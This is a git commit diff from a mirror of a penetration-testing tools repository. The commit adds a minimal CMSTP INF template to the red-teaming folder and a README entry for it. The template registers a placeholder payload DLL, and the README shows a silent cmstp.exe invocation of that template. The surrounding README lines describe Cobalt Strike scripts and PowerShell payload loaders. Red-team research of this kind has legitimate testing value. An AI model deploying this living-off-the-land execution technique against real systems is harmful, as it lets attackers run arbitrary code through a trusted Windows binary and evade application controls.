mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
cmstp-template
This commit is contained in:
parent
8247ea72bc
commit
4bd6cfe600
@ -44,6 +44,12 @@ FullLanguage
|
|||||||
|
|
||||||
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
|
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
|
||||||
|
|
||||||
|
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
|
||||||
|
|
||||||
|
```
|
||||||
|
cmstp.exe /ni /s cmstp.inf
|
||||||
|
```
|
||||||
|
|
||||||
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
|
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
|
||||||
|
|
||||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
||||||
|
12
red-teaming/cmstp-template.inf
Normal file
12
red-teaming/cmstp-template.inf
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
[version]
|
||||||
|
signature=$chicago$
|
||||||
|
|
||||||
|
[defaultinstall_singleuser]
|
||||||
|
registerocxs=r
|
||||||
|
|
||||||
|
[r]
|
||||||
|
C:\fully\qualified\path\to\payload.dll
|
||||||
|
|
||||||
|
[strings]
|
||||||
|
servicename=foobar
|
||||||
|
shortsvcname=foobar
|
Loading…
Reference in New Issue
Block a user